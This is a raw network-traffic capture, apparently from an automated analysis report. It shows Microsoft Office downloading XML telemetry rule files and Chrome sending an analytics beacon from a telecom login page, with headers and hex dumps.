                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 3a8fdb30-b01e-0084-08d4-2ad736000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131202Z-159b85dff8fdh9tvhC1DFW50vs00000001eg00000000aph7
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      69192.168.2.94981813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 12c3b8a8-601e-0084-2933-2a6b3f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131202Z-159b85dff8f5bl2qhC1DFWs6cn00000001eg00000000b14z
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      70192.168.2.94982313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:02 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 64f5c2f9-201e-000c-22cd-2a79c4000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131202Z-17c5cb586f6fqqst87nqkbsx1c0000000820000000007b24
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:02 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      71192.168.2.94983913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:03 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:04 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d24b0423-701e-0098-2b81-2a395f000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131204Z-159b85dff8f46f6ghC1DFW1p0n00000001u00000000081mp
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      72192.168.2.94983613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:03 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:04 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 485
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 98e85290-a01e-0021-7dec-2a814c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131204Z-16849878b78fhxrnedubv5byks0000000800000000001nn0
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      73192.168.2.94983713.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:04 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131204Z-16849878b78p8hrf1se7fucxk80000000afg0000000075kf
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      74192.168.2.94984013.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:04 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: ad1b4984-801e-002a-3571-2931dc000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131204Z-17c5cb586f659tsm88uwcmn6s4000000021g000000008y4u
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      75192.168.2.94983813.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:04 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 502
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 10f07cf3-601e-0070-28ce-2aa0c9000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131204Z-159b85dff8flzqhfhC1DFWrn0s00000001m00000000000m8
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      76192.168.2.949846206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:04 UTC3400OUTPOST /rb_bced360d-a02a-4b73-b0e7-46fe5ae1dc34?type=js3&sn=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0&svrid=8&flavor=post&vi=OSRWPKERGJKLBVFCIANBBATQHLJBBKCA-0&modifiedSince=1730276476420&rf=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&bp=3&app=429b1eac4514c5ce&crc=2088849961&en=gticcd0a&end=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      Content-Length: 736
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
